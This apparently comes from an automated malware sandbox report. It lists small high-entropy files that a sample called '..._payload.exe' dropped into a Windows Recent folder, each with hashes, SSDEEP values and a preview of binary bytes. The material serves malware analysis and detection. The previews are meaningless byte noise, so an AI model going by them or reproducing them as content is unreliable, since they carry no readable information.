                                                                                                      Preview:ONBQC...".....;*.v.&Q..5..MX...e1a7~....)~.....imN;.<um.....8..g.s.l.L.!..Y..:..&...|...d...G4..~.bN.J....4.k. .Y.+..D. u....q.........P..RNY...EU..Ch...}..2....q.`k..=h5._A.q.U>j`..X}q..4.R.....,...=,..L.X?,....9..)...b.........2...}7..V2s...a..@.I..\4.x."`=m..A.[......#..#..x.W7......4.......=.!.MM........Bs...</+&(../..........gx.=J.0y.F.&-P.....$....q...[.{.-Ip.G.^.....A.....rD.-....gz.lx....v.8..U\..'d3%..m.u.T.....b.k.%@.........T.A.2......=.V2iD......T3.."~.._q.gKq.b...j.-:.Y..)D......8.....n5@7..ge...%.eo.3p.cO{F....Y.IxW....e0+.ym.p.......AM..=]L%8....!`ko....t q..q....Lf..o.I....i....3....E...cV7!G..K.b$...:.a..lz.....1..@.4.W.u.z.....I..;....',.]......k._t8..d....Q;b......(%2..:g...s.]\cj..P..9...<....t..}!."k.,h#..^?_L...|y...~s../E.n.V.G.-*..E.p.<...J..iM3I......... .7e.W.uo.....M.e4...j.Y...f...Y~...6.8...b*.X.R*.J.2d.z.(.v.z..V.Y..&*....x......R..K{.P....t.E.q.w..?.]*.e...d.,......o..NX}W.?...>;.Z.NK.O....A.L...k0."9.`.]..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857782926515681
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:barGcEcAZ/F/EENuD0rSnkbNtkXNKIZMXVu//72VSUcOg9no6jvnV52uv6bD:kGcW/EEsDISMyXNdZP//+S7oWnVguwD
                                                                                                      MD5:A1898A9DF3DADB2EDC2807AD5EA7D9D3
                                                                                                      SHA1:98835876B09D368F3A334EA1E6AAEF2FCED44A21
                                                                                                      SHA-256:CBBFD774594123EA8763223A018876A60C2164B9C4285AB47865C02EE62C440C
                                                                                                      SHA-512:7B4670D4C5C585356D8403039F9A77EA841E84A07633C65EF293FC34FE2DD8A7E2135D5DE6950D0DFC4B6F76CC6B3106A4B5B2E8963D2FFD42AF01FB028DBF81
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY...."C...TtP..[J...B..!yg...@.t......*&t..'..5.u; #N..7.Z....$....Z.jm...i..,,."p...1e.^..L....@Q`.......-d;.ab.l\21h.eT!.|....!.1l..O..F...{..........nz...zv..P..$<...Hw.o.*...d....$.! .6..:...c....qb.E.l^....b?.U.......M.`...X....r...|+/?.t.....>......J].U.q..g...x,...y..pVQ....u.=.A.........U..U5..E.g.....{S.Z-..x...,.R..../...,.0:<Aj.5.X.]...~.(^.Az..9..W'.\.0...].s..J.B..D.x...7N...AS.Ax.W\...q.ry}.......TA..7.=i....#i.4.%^g..U.!..Y/.....?.......=...E.(Oj.S.v.@..5.Q....0k(..:..w.sO;..:!...G..Q.....F.S%.AC.T.y.e...+.[.V?.Pe.m?Z._..|3.jk.3..4.zY..s..`.hc..US.JR.V.[5......"....Gt.TI..;..bc....c\....P/.x.~....k..g.9x.......K'.4&.=..(.&of......d.p`.9Oac....48~.D?#.3.g....Db.....J.R.;@.P.uz..Z.EL:......Q.y.......1f9.*.....]......(.l....An.H....8-.o..K....`lr.>..... W./....)..Zf.ep..RP ..&..}.C.3LlLib1.w..'...{.......<t8]......\m..Z}....x32..3.emo.u..J.)P.X..&".p...T.z..H.>1.5._.{_}7V&....%V8.P.)..`JI.o..zP..4tO/.Ux\.3.X|&.@.f.rC...r.7

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.828429896346449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:N3Oh9QtULGBPO/mn5dKo3id3pkqBLUyDkbwvGGmTDIPGcnKoK6a2v6bD:xSzwPO/meiIkPnQmvIpM6a2wD
                                                                                                      MD5:E7B4AC8A81F2BE6EE50A67E2802C5EF9
                                                                                                      SHA1:26E509AA3F95B33C19643EDDD5CFA7CDF777FD6D
                                                                                                      SHA-256:D300E4BA95335F820A6B6EA2219FED8E040C6568C973671EAF111B4A450C33FB
                                                                                                      SHA-512:28EFDB3B30A2EDBD470F2F00D260463B07BB98404A87E0223262EB240D53D9F1190FE5648CD580F4CA3E8CAA238A50EA756D1BA4101D6691A62101F58FD48944
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY.....u.(..v@"}Kkr!.Y..g.H.qK...n....4....?.|.G..~O..3.`.hG..Sj~...+..T!.H...C.R!Y$..'}Ld.=W.ci....r..{.wf!h..?A...0..yLb.D_...M.BO.65I.&j....%F.1...o.=$.v.tP._.....\..{.k.......IBp...k.....g.lZ5y~?...o.........k......q..(...X.|.3....t...j..5X:...~.z...G..(Y$.z..BB....C.qIx...zz..8tx..O..?3G.....W....&..T...+..&.z..n.]...h....%...Q.WB..W.lz....1.Tc5....GG.lQo...5ZZ.|....,.....6....f.....&..SXT#.....%.\.........q......q.......I..+...Q...0L...Y..k.'.~......\o.>|.H.A/.!.H.:.j.4..s_...J....jy..2F.[/..A*.:+V...q<9.M..e..w....;...2...-7..Ad.o...;....!...sG/..)..F&K(.n4.....xR*=aZBF.2..+./..<.i..L..%0._..\P.Y.:?.p...Tc?.N.0?...z;Rp...$...z.*.D.......|..*"t....:&!.4.H..~.B..#....9[.c$&..{M.....x.h.....r...........7.u.d&..bAYk..%.-....y2SD-cBa..;.@....d f...)..f..{..iz...R}o.../......@.!...zx`B={i0G..M2...<.j...Y..'....SV.[......O=.......L..y...>..AqH..._&)GW..d.j.08...h..B].V_...v..T.:>..(....?.(.Ij...fh....t....W.D.q[zw...p.r.o.*..W...(.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.834968409194913
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nZvcYmev5If6T2pZSvl9D7HoG99P9sMONwYPMsyCqhyW+K/7Pr3apCQcqv6bD:CORnGZUXISP9sMONwYPwmWx7WCcwD
                                                                                                      MD5:559CA9A249102DD01BF08AFB17274AEB
                                                                                                      SHA1:AD1F85AB27E995D2217F42979422D0447620C0FB
                                                                                                      SHA-256:A28FC987EF6C9A1B71470979C98B1F437385A4F0916B7AB7E6047168B5EFAFE1
                                                                                                      SHA-512:2733BFB4A39BC77E637E632333CE5AA7C119089085AEEE82530F103F2B94EFAD428B7BEC3D4221199E71B9D1EF706957E600714E8856CC39541D09CE5BADCE8F
                                                                                                      Malicious:false
                                                                                                      Preview:QCFWY..Ec...b.i.Q..;..H.AK..z^....q.0YRJE_.W.....v.8.:.8.....?..7......|.x.\.....z....`..?4.....=.i.70o....#.vn.mXL.%......Yl".7.46m...N(.i..s.....-.......oL.@...L.n~.7yk....T....{...q.....".H?$g.5F.w}.L%1..UI).8.s....d<;.jg.\..v......".N..M.0...u?>...B....42e._E......U..4....D.HA<!.....=CB..Qc.. ...5._mnnu5.$..(B.5:....R..%.J...:.{..*#.gSh.1......m'Q.W.....].O0..........U.a.G..`..#.Q...?..s..."v.n..%......o'..Do.Z.B..2.*..&p./%..|........$>f...K.k.."K>....z..2w....+a..m..+.9..JD.;b......$l.. s.Ey[....IS.j@.Z........[......t.<...0....1.@..2Uh.....C.&.p....*.vE.._hG.3D.(.V..&....b..s.E...[.6vv.Ak...G2o...b.i....`'~.....X......W..R..l.zz...cw.V...1..;..DE..MV.n. `.B{N.<;..3.;...5o.pR.Q..........U.5.R.8./j.......v.o.W...j.......:...[...D..0..?....O.W_<B......U..7.h+". ..v..L~.`Y9..;..i..".L.6b>.7R`..C{&=....~hltY....G.BM/z..+ds...F.$.Ii..........u.H.lQ!....Y..C..........s.x......S.1..Q.,.H.y.6.S.F..7......A.k.c%$.}......xef}ow.*Rw8 .RX......

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\RAYHIWGKDI.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.852947238477694
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:v5Tz0G5HWE9BRz1PP5nB7ZuvZvCKUfZ5+AUb1GxQTkpdA7ov6bD:RHDHWGB1NP5nWvlCKAP+AA1GSTkfA7os
                                                                                                      MD5:86DBF3FE89799AC2EA5884BB5A61834C
                                                                                                      SHA1:42947FF7110D0AB6D108C22C02A3463C496180D5
                                                                                                      SHA-256:3CA93E5EE7AAF67B827975BC9E6C8F1292F4B1092E6E2FF316DBFC5BC6D2FA7F
                                                                                                      SHA-512:3617B26E81CFCF8A980CF6AB6EF2BBC59E1772137FD69E94EBB43EABB4A9B5981DD6A456DE91FD48F9B865150A3424413B6F00287C68CB21CE6B06662CF0958D
                                                                                                      Malicious:false
                                                                                                      Preview:RAYHI.i..qe.....mHkT........J...".`...l.......+z&.K.g....#........q<..9....Di.<.b`x..+)l...v...W.w}.R.C.%..].c.K.....d......]..l1.7.2..(..g....;.hy...=.s../..K....K!..9.!..F....U...........S.]..]M.I.6G.:Q..g..[.......#...d,Z.....r.VM.p.....a..q..-..G.k.].}r.E2s.....}...t[..$.?..[>....0..mw...n$..t...D..-.9..J..9u......{.;g....5.$7.;F..S.~...).....8..y|i..Dg.....KU..7[...?..t7.e4.........i.I.#.b.l3.......R.}.@...<.):p.6..E!..z.`...'..8.>...3.......wF........^..7..:.-..........z...9.=V..b.U`..b.x.....&5.....n.iO.r.........R....h.....u..........`..........TI..m^x...."....Gd.*L.I[..a,....p..g.LD2...O..D;.B...[.M...d..... .J6;.).}....9....Z.<.t..+C...a._z....j..p[9..U*T..R7..........l..5......z....y].5e........m.Xv.....^'..&.Ul...............4.-J11.`..{...i7...ly@P........Q.O....^..b..T......k...:~,.7...o. ..... .Fg.-nq.5...Mr...$.P.f../.R........a.Y.:....A......~FZP...t..;3...1...H....'.u\&@}..<:0...Q.r.&. ..*~.b.p.W.2f%F.......Z.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\RNCDIJFLUP.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PRO-PACK archive data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.838854937122424
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:idmn6JZzp6xoWHxYI7mFTv3ZtEtelQTDZwKe+wawSL7JbMllA/ZCwzLcxzI/mqcO:em6ZzpmoK4l3ZStelQ/qKFvLtb2wzLce
                                                                                                      MD5:CA743E20E46D4E9E78CEC72913CB22B5
                                                                                                      SHA1:2E310DCA2058CA07BFE6D3F97FCE3B9AB58E8BEC
                                                                                                      SHA-256:2AE7700C7168B5A7719B1295B17B8E50E8FCAABF5D5EBF91D13133A1B98EE67E
                                                                                                      SHA-512:85A200FF902584CD42820212E07671F9F7A490BE061E9333577D7D0D597C990BFFA26714C03E502C2336CFAE74C36615FFEACA05DF5E0CAD5CE7737D11254656
                                                                                                      Malicious:false
                                                                                                      Preview:RNCDI.wn.........$UE...'.=..Z-.....k..'00.a.B....@..........Q?N|...$Y..n.C3....._.b...l.j."....#./....j....RGpM........i/=....Q.......U..4....m.<.t....:i.P..S+..x.".h.7kA...p..t..H.Yx9..d.P..QJ....o..h....{.tO1s(A..4].0=..GS......S.PK.y.P..={37f.0.....S...u-.o|:...n....I.8GdGg.-o..&.<........L.........>.Uwid.....%...9.=.y.l~B(.......R.4.o1^5w...\`.1TSj.....*=.?.g..})......V ..........,t7.g".O.j*Ggh... .}".,.....L....z.n.7|..Q.:....SL.........y.c`...d`..........Q....o.x...d.....bY...s..a....C....sD$.<.B.7.M...6..6b6.,@.&..o.........=...Z..9@s....;..^..,o...`..TMp..EIo..2.c.Y.]..er..`@R..A..*zJ.....:..vo#..n...58.... ..,..74.?H.EapJ.g"#..&.G6.o.\D....<...|.y..CS=R...(.. .I4..2!......m-.bm...h.L.H1l...?...^.(Y9l.W.N.,Y.....w...F/......s..Eq...8.W.z...rU...T......+m....,"!.V..b4YJ.r2.@....>...X.}Q..N.....R.Z...'.I....&.mPe..^.4J(US..r..C....E.[.....Q.. ..;..~...`.O.R5..~3Xp..z..-.:\.."z.. .;.&....jd......r"5..v.=....{.W......m5..7t..bc.......-.m>...h

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SRIWZTPNYW.jpg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.849481720808541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:m39yvIwa6AnyYR6ju/sCBbVG4qTKcs5Ur3LziSeyPXNbKjoCAO+0v6bD:MyvIhtvwuh/PrnUnzMcEkCvxwD
                                                                                                      MD5:F392B398A450D5A2D6BBF3824798A924
                                                                                                      SHA1:E8F358F531F31DA3C98FFDF8561B9A2FDA4BC4CA
                                                                                                      SHA-256:97E6F4F77A95125F0E78BBA86A7A600D6570C5B435A020D65791FD5430797B8F
                                                                                                      SHA-512:6389DE58E865D2756474CE777986173D093D9DB6225968ECE31F86C17BD7D62E16A05CC5CF62C71A5CA67E88DBB885E422F465B1402FA8B1D8D44C26D534C340
                                                                                                      Malicious:false
                                                                                                      Preview:SRIWZ.....Uy....6..G_....B..fO.j...u!q.}.L@.6.\.J..*!.>.c...49h."........1...&K?.A.....da....8q...cO....#*....eu,.....\..`.%.y.....#=.. w.....&......u0..!.._u....w.A./... ..c...Ad6rg.uYh.De.d|.Z......9.m.wy.;Vd.W..#..`....y.c/i..S,,9.:....x..0...J....T.%*.O.u...|.....rD....hsQ.KH.2X...ek..>...d..T:...i2...m7|r|....Q....%...lr.h..V..._....-x..]...U...... ._.~.B./....U......T.o....k .$~.w.......K?.....v.B*.8.}'V.......w).P..8f.....ES....j.`...)D.ul..I..;......".....T.... .@...-x...M......s..~G ........+s~......<sY...;`2..{...g.H...U.b.M.._.{.3.8%.s..zI.3.>.......T.F.r..u.|[@.._..6..$.fG..G...p.^."osZS...@1.....+R0.....3.c..+.'r.6V.../......U.N...DW.ehio...;.M.G.}]$..?%I.I.Km.\.*...T..A..!r.).vK....3D..k.....%D......ph.m.-.@N....LBs.....:....@o....0.......%t4..Or......88.0....h.Q&s.Iwn3.>X......O._.q.....|..S.1....L......v.o.....x}6-.b.BfR.B......H...X...S.a.....h..nE....=..b!.........G/.........T.F.Ko...eZ!.~.........C$...Iv^D.M2?.Mx{._.y.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UOOJJOZIRH.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.841409680648201
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:iFsz/dyicdsT4aPaOg0s1paGJgFV0n5pixQT5HezDdx5dCZmKMdUDv7CwTv6bD:iFkyiACjPaMmPgsCxQToDdx5AIdUDv7W
                                                                                                      MD5:01A5007EBB488AAC676AC0536E91F920
                                                                                                      SHA1:6EC00C0567A84BC5F955FA1D0EE4F30928AC80DE
                                                                                                      SHA-256:A922CA70AE593956254A363B346EB3379B02952671F30A137571BCB8C18BA15F
                                                                                                      SHA-512:42BA52E9BD1FBC553EA7A6CDCF2D3AB63F713D74C564E1C22CA1ED4B94E21324BB896F9929CD723C88F9054DE715B86427B991FEF6114D01730F2FD591C21F2E
                                                                                                      Malicious:false
                                                                                                      Preview:UOOJJ...........Sx.O.....@.;.....p.....|:.K........1..A..?.bXAD.~..W.......o4.p.(^...<..../<#..0..V....@...[.............,...-....+..;p .I..3...._..0.H.;x....vu....?..v.-..{(..!y..-.Z^..R....BHT.......C...].....xd..<.5..ve...|.Xj.........z.?....o.}.a.2.c....M.=..=.......v....u.....T.@..*..@o~....i..L_K...}&....d.y-:.[..q....J_..0.K.@`..>..b.^..#hh&t>p.k......v.2....Vk...!.^uz./.n`..g..}..)..........0..v<.me..:Wg........h....N.L.........<.`~..(O..evO?^.....0.....N..F.t..Q8...T...9..<oY|3~A)q........W.]eLs82u...ye...J.1V&..O....?9.5.f|..$.b..5..f...u.K.;..(..Do.L$a!.......Z...?.2.n.D....x.S...c...W..O4.C5Q.bG.s|.....].p.GG....C..jqNZp....>...).....| .3..Q.g/.:.....7... %......|C.I......{E .c..&.u...5..0e.&.Az..5=....g p./=.xa..;...U.6}.,.>...P". .....d.>....X5..."...b......o.....(.A.....q.......wf,w.INs.F.Z.[j....N.....V=......].....y.WE........(Sb......b.....T.C...H.K...~..^...H.Bs....B..$...=@..}...Aju.......f.......]m..:.{.$.T

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UOOJJOZIRH.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.872371729501544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pDyv+gjR74TU2CXVtH6far02QjO5pKdhRfK2gk7rc5Hwbs6ciASjv6bD:pDyvV8U2OkfaryypKdnid1i3jwD
                                                                                                      MD5:C9647220951878E23E40888EED3C73F4
                                                                                                      SHA1:DF28623A151F99D68140E692E28400DE52E0C15D
                                                                                                      SHA-256:392C652D7E70CDFD4614C1DB9493140D4228B0AF4C16C8B2EFCDF4E49FB01204
                                                                                                      SHA-512:50B126064A499946A4AC04338B70A15AA61751D9B49CB8F6E3A46B4DB034890035A197EDEE0A189C5EEFBAE02A2267E71EA90579FCDA982C477973FC615A2E75
                                                                                                      Malicious:false
                                                                                                      Preview:UOOJJ@*....~..P.N.Ky.X}.Y@P..."..v.Q..4"t)...t.Y.w:.. .`............o.S...1)0/.....h.Yz..Rs..w..!?e....j.w......N......8D.....n.,..S..^.......I.(...Q....xU4.]VY.)x...n.A5....?@H.K).........aJ.Ql..<.W.^`....c.>.....G.....,....i."$....7..........8.P..i...3....,..W......1..P.8W[%.D...|.w#J9..ap2i.;P..2.qv.4f........8.....;_a........."6[1]....y..K?kUN.....I~;p.H..bX...Jv.!..H..^..y.wEh.a...Yq..H<%b:........E...Ew.!...A...(...c. .H.....I`?..W..7.w.m.\..u........u.2w^..U.i..C.U.d<...R...<Vp...@..w0.&.R<..F....%..+.^/....L...../5...4.H.....1Z.Z...:.x......5.i.....I..B.E.'n..w....F...........|..Wq...E.#...;<...s..q...l@...H...V....v.p..&2.&....l&...l2....(^L5T.....h....'..<c..+.p.ukw..@....|.y;W..^Q....s./.q.2L..o..nN....g.....V4....Tm.`zF......paK.~_..K.<..\.$Z80....-!..............y.)lu2..3W....3m....mh[t..V..4....h...\..#.#I..{...t....J....<.<..S.y..J.~l........g...].Eu...J{..vh...z...}..KS.nf...Ck...r^.=.e.'....k..r...&\..e#..al/..l...s..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VFMANBAXKI.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.815767128262009
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:LA70sdsyIraGnRHimMprH1MjC5kGVzKZ63T12zYEMUVAN2Gj1gWv6bD:LAwisXraGEm4ujjGVOEhwXGhgWwD
                                                                                                      MD5:B50C22E8EC39C30A1A44AD5F7AE5755D
                                                                                                      SHA1:A7F9E94C963CF2EB785FBB8B3EADD3AA20906291
                                                                                                      SHA-256:CC7FC14DF80800F738298022038FC1BDA96881C8960CE521212D087D99EF31F2
                                                                                                      SHA-512:247D59CC23D5731C6158CD07F59886807D20D7429100C6066FA78C208DCDFC5D9D998A404E1DCB6D1554A47DB93D469EFCD593412259F2E5949AD1090EA8A920
                                                                                                      Malicious:false
                                                                                                      Preview:VFMAN\~p.B?C.fE.a$..Y.5.sv.....*l.............S..o...Oz{S..O... sd..a...6r.."y....!.b.]....o....![.=..O:..*...}C1.c.Q.B...~.eC.].h...%.*..B..D~...QT9hS.l5~2....5r...H..|.\?U..Q.4.Q]T..+p2:...q.X..I.7r.rC.Z.B..{...35x.S..1.....>.\.....-.*. .....8..Z-...T......1.G.)g^....6\.p...../".j.:7..(..... .?e.d.*.w$f.s...q...m..t(..h.....m...,......T.{...=......y.X................._2O5knC..t]......4..2.3..t....H.Kj.oDe).... Wb....!..b....|/...1..\..=....Y81=y.J0@...;4...w..)..kcqR0...I.{...W..Z..as.Z.7u.)....$9.n~|.=F...p_..t...c...inE...o.Y.1.r.J...-N4.g.O..&..8.\..9.AU...b.2......o.d.-l.\.tIqGB...H.<..8:8-.....7z....p....k.......g.ac......-p........$......h.*:..2i7.jo.{PO....^4.]...(..c....n...x..H.........c.0...i...!N;.y.j......tB...E......"QsE]:l.._.1.y..lSG..g5...H...<.>.2.6.)=...s.L.R.....D.d T.3/U...V.'......G....0F..._-z7....m...|...M.P...f.pDp.(.ED.}....S......p5....27.N.}.fU6.hn.....: 4...O.ZS..........a.t.P..x.pU.:lD."w.o.}s.n...7.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.mp3

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.864983791073387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:yrCgvJvX9ZkCEuJ3t/O9wRLz63dh+jeRGhhwM8c89lUgcdHY2GdQ68v6bD:ivZLZ3BO9wtz6NeeMLMcYUc7Q68wD
                                                                                                      MD5:E21D8C9F9E2159282288B9377ED1404A
                                                                                                      SHA1:6E781759C32A72C65547057CA9A5BC8208606BF8
                                                                                                      SHA-256:E55CB365ED14525D656EA9367AF750D85D23D5C8A706DC77FA50678923F2AB4C
                                                                                                      SHA-512:85E120D2B410F9F36B16158781D74F999DBE7C9E705B67CCEE846FE38260DE0B5593039D04EF1EC5991183A949E5F923ED142EF9FDFFEA9560BE3E511440CA02
                                                                                                      Malicious:false
                                                                                                      Preview:VLZDG.?`..2.....3....\d...K.K.<".......|b...7....Gl..mnEq.J.N-_.....X..P.3....B.....g.......2.oW......m....K.C.FI..&...#m...xNRNl..tWZ..(.P5..... k..]ff....>.n.c.6.....rn....~.-Ql0G....b01.d...!...,..|....a.=...U&.p. ....,]...e.....z.....y..{.!.`..#&.*_f1.....F...) ,..G...l.3.i[!.."......r.d....C....%.9...7^...r....u..mCQ ...W.C.X..|.|........s.l..4wR/..,.V_g@.$..z-....Yq...N]K..d...u...Y.G.Z{...%..T..!.A..m..J..Z...(.3.....:......8.......[..fy.H.}.vY.$..L...H]...K6K...n.y/.G.w..,g.........=z..Xf..v..Fc......f$A.b.V....f.N-......wT_V;.+...![~..S.k.u[..-.Hg......G....8.U~%..K..k.......j...v...;<T.A./.X.^R..C.l...a.g...}.'.VBa.....c.Z.M.{...S..J).X.....i..(.=#.......S...g.v._..7E )..PU.....av....\,...D1.....dKTo.M...tO.x...O..yd...x...T............e.......:..;.....r$z%.=.l...R.D..H..MG....)..B6}.9N.O..-2.......[,=.Y......g5...@..<5.h...K......dx.G.k)...H$O#.8N.<z....;.a.$...#:.@%.c...FZD7...%...^.x.0... $../[.6L-..........@W

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848604768251051
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8Il+wkrgCghOVtBDy1KN2DdWiNjPCgmAqgUHbvKL4zV0uQTw1/MnmHO7G4v6bD:8a5CAatVy1q2tsgXqgUrKL45xQTs/Mnq
                                                                                                      MD5:4569252BD5C10DED2BABE2C9EF2FCEC6
                                                                                                      SHA1:6D6EA221502FEDB26DF4F29DA286DDC646DA9523
                                                                                                      SHA-256:CA381A66F81E5B0878726F95B287BED9471D63AA2E6223582D00967897833037
                                                                                                      SHA-512:6855E994C0A2C09E6243A3ACAE25A0CFC1E185C6C75D1054B7F5C71D5D9ED19D0D285A7C74CDBA326CE8E33886A52F3707FA8F5507AB75BF981D316364E81124
                                                                                                      Malicious:false
                                                                                                      Preview:VLZDG...e.M.a@....N...Ol.8p .MxnK.~.*~..t.].#k$a&.h..+......0..7.t.0..[....E.....c0YF..M....|`}7..`.3/*.D...l..`.hg....V`N..'ZEUv;...5*..@P.cjv.7..X>d..(...Pnih,P..c..H.K7.o..vI......_+.B.%Fmt.\.m,...&W(.....]..a......v.+-.vmX..F...5.C.....s..n...r.<.V 9rbj.~B^.^.:...Hh.G.....1b.)Y...[{=.G..^j...Cr..`..k(..g.4!..?z0.V.[Z.....1.&+...E.0...>Q.{wN...H..Mc<*..//}....O.$s......C.sYO.Q1.y.\S(...c.]..%.."..--.J.5......O../..m^..~..d..8g.....YXW.6>5./O....aD\..L..<3.".b.._k.f.Z......I.`...]'...[...E.f....s:....4..{..!gU^.pc..<&j...wR.q&5....$...1.a...[...7%h.........81.R.`{....<T...1.!r..&H....9..3]...?.@]..[......`....S..u.mpsd2.A.2.0.........k...+...............#..X..ZY. ....M..k.=o.>...).1.B_8.......{....pD..c0..B_6...P.7.{n...f..^.l.B..K............v...Q|X.3). n.......`.....@.1`.r..f."W.t+.P....6..;A....M../el:..2....9....._VJ.d..o.z...Y..1Ez.p...nt$?..+&..t.......*...*...?B......;x>.NO.W.. ...`..gJ9..;..7..Yk.P...Y...j...7....O1.Y..%

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VLZDGUKUTZ.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.845157805087196
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+WW81Urw8s7tt7EU8PHQUzIZRgNF3fJ7OpnCPSPWhj1Qv6bD:q8608s7r7EpQUhNFPJ7OpApj1QwD
                                                                                                      MD5:1436BF8890C090566489D4272DE57309
                                                                                                      SHA1:903BA9DB9A95C5B62255E7C7C55B7F01A8A4EAE6
                                                                                                      SHA-256:0660E9A144C3667F1E11925B76C164AA52B6EF02130D33DD284C47BAA4CE5A9A
                                                                                                      SHA-512:48277BFA3F4B806978D411B70932C9F2F4085908DA5D2220B8BCEE655906BA30391FF99FF048DB9DBF3B1C7267A999A2DB0C33E1AB3AEF13E6DC828EEAF07943
                                                                                                      Malicious:false
